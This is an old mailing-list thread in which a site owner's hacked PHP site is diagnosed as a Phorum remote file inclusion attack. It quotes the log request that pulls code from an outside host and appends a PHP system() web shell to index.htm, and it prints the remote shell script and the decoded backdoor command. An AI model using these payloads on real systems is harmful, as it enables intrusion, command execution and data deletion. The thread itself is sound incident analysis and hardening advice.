My site got hacked. I'm not sure how. Right now I'm trying to track down 
several different potential leads. WebStats might have been an avenue of 
attack, or Phorum might have been an avenue of attack. I installed Phorum 
on my site 2 years ago, but it had been supplanted by software I wrote 
later, so it was a section of the site I never went to. Still, in my 
access logs, I noticed requests like these:


GET /lk_phorum/plugin/replace/plugin.php?PHORUM[settings_dir]
=http://www.ruffl3s.hpg.com.br&cmd=echo%20%22%3C?%20system($cmd)%20?%3E%22%
20%3E%3E%20/www/krubner/index.htm HTTP/1.1" 200 313

What's it mean? I don't have much experience reading http requests, so I 
don't know how to interpret this stuff. 

I put up more of the access log on my site, anyone with any ideas is feel 
to look at it:

http://www.krubner.com/


Every file and every folder was deleted. I can't imagine why anyone would 
want to hack my site, it was a small site. Still, they did somehow. So I 
don't know where to start. 

My site was mostly PHP code, but so much that I don't know where to start 
to look for security flaws. 

Read this and cry:

http://www.security.nnov.ru/search/document.asp?docid=2952


Take care,

Nik

The Default.ida NNNNNNNNNn is supposed to be a server sending the Code  
red Virus ( or trying to send)
That is what the CERT Site says.

On Tuesday, February 18, 2003, at 11:13 PM, spam@k... wrote:

> My site got hacked. I'm not sure how. Right now I'm trying to track  
> down
> several different potential leads. WebStats might have been an avenue  
> of
> attack, or Phorum might have been an avenue of attack. I installed  
> Phorum
> on my site 2 years ago, but it had been supplanted by software I wrote
> later, so it was a section of the site I never went to. Still, in my
> access logs, I noticed requests like these:
>
>
> GET /lk_phorum/plugin/replace/plugin.php?PHORUM[settings_dir]
> =http:// 
> www.ruffl3s.hpg.com.br&cmd=echo%20%22%3C?%20system($cmd)%20?%3E%22%
> 20%3E%3E%20/www/krubner/index.htm HTTP/1.1" 200 313
>
> What's it mean? I don't have much experience reading http requests, so  
> I
> don't know how to interpret this stuff.
>
> I put up more of the access log on my site, anyone with any ideas is  
> feel
> to look at it:
>
> http://www.krubner.com/
>
>
> Every file and every folder was deleted. I can't imagine why anyone  
> would
> want to hack my site, it was a small site. Still, they did somehow. So  
> I
> don't know where to start.
>
> My site was mostly PHP code, but so much that I don't know where to  
> start
> to look for security flaws.
>

Nik,

It's CGI, does that mean that if PHP has been installed as a module it wouldn't work???

Carl

> Read this and cry:
> http://www.security.nnov.ru/search/document.asp?docid=2952
> Take care,
> Nik

Nik, sometimes I think you know everything. It looks like an open and shut 
case then, that someone cracked the site through Phorum, and then for some 
reason felt like deleting the whole damn thing. 

This also suggests that this attack was unrelated to the last one. Jesus. 
Why would anyone want to bother with a little site like mine? If you're 16 
and you manage to take down Yahoo with a DOS attack, I can imagine being 
thrilled, but what is the thrill in taking down a site that is lucky to 
get 30 visitors a day? 

Thanks,


lawrence 

> It's CGI, does that mean that if PHP has been installed as a module
> it wouldn't work???


Yes, it would still work.  The only way to prevent this would be to disable
register_globals.  (It wouldn't hurt to perform some validity checking on any
user input, but in this case it's unnecessary.)

If register_globals was off, the user would never be able to overwrite global
configuration settings by passing dummy values as form input fields.



The offending line of code is:

include("$PHORUM[settings_dir]/replace.php");


What the hacker did was pass a new value for $PHORUM[settings_dir] via a GET
parameter, so that the actual include statement looked like this:


include("http://www.ruffl3s.hpg.com.br/replace.php");


This is pretty standard stuff -- include() includes the contents of the file.

Let's look at what that file returns when requested via HTTP (which is what
include() does):

---- replace.php ----
<b>[root@l...]# id; uname -a</b><pre>

<?
system("id");
system("uname -a");
?>

<b>[root@l...]# <? print($cmd); ?> </b><pre>

<?
system("$cmd");
?>
------------------


See what happens?

The script basically ouputs the HTML version of the system commands, and then
runs them on your machine.

The kicker is this line:

  system("$cmd");


if $cmd was set to "rm -rf *" or something like that, you'd be screwed.



Take care,

Nik

> Nik, sometimes I think you know everything. It looks like an open and shut
> case then, that someone cracked the site through Phorum, and then for some
> reason felt like deleting the whole damn thing.

I don't know everything.  In fact, I don't know anything, really, except
google:

  http://www.google.com/search?hl=&cat=&meta=&q=phorum+security+holes


> This also suggests that this attack was unrelated to the last one. Jesus.
> Why would anyone want to bother with a little site like mine? If you're 16
> and you manage to take down Yahoo with a DOS attack, I can imagine being
> thrilled, but what is the thrill in taking down a site that is lucky to
> get 30 visitors a day?


Well, my guess is that it's just immature online vandalism.  People are more
likely to attack a site that's easier to take down than a big corporate site
with a large staff of web developers and security analysts.

I think the thrill for these people isn't so much the size or popularity of
the site they took down, it's feeling smarter than the webmaster who doesn't
spend all their time keeping up with all the latest security news and patches
for the software they've installed.

It also goes without saying that frequent backups are a Good Thing(tm).  Keep
your website source code checked into some code repository.  Stuff like that.



Good luck with the rebuild,

Nik

Addendum:

The cmd GET var you posted in the access log snippet is decoded to this:

  echo \"<? system($cmd) ?>\" >> /www/krubner/index.htm


They appended the text "<? system($cmd) ?>" to your index.htm file, so
whenever they wanted to execute any commands on your system, they just had to
request:


http : // www. krubner. com/ ?cmd=<malicious stuff here>

(I added the spaces to prevent people from clicking on the link)


You can see them taking advantage of this in your access log:

200.176.55.80 - - [17/Feb/2003:19:53:56 -0600]
                  "GET /index.php?cmd=ls HTTP/1.1" 302 224


Take care,

Nik

One more thing -- you should *never* *never* *never* have a publically
available phpinfo() script on your site.

If you need to use a PHP info script, then you should password protect it
somehow, don't name it "phpinfo.php", put it in some directory with a
nonobvious name, etc...

Anyone can have a simple webspider that follows all links and replaces the
HTML/PHP filename at the end of the link with "phpinfo.php" to see if they can
get your configuration data.


Take care,

Nik